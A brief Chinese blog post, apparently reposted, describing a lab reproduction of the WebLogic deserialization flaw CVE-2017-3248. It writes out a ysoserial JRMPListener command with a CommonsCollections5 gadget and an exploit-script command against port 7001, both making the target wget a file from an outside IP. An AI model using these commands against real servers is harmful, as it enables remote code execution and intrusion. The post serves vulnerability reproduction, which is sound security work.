CVE-2017-3248简单复现

我是这样操作的
目标跟windows在一个段,linux是另一个段的,我的虚拟机

windows主机上

`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt"

linux虚拟机上执行

python exploit-CVE-2017-3248-bobsecq.py -t 目标IP -p 7001 --jip 11.205.242.98 --jport 1099 --cmd "wget http://11.205.242.98/32.txt" --ysopath ysoserial.jar

CVE-2017-3248简单复现_第1张图片

简单证明即可

转载于:https://www.cnblogs.com/mrhonest/p/11533997.html

你可能感兴趣的:(CVE-2017-3248简单复现)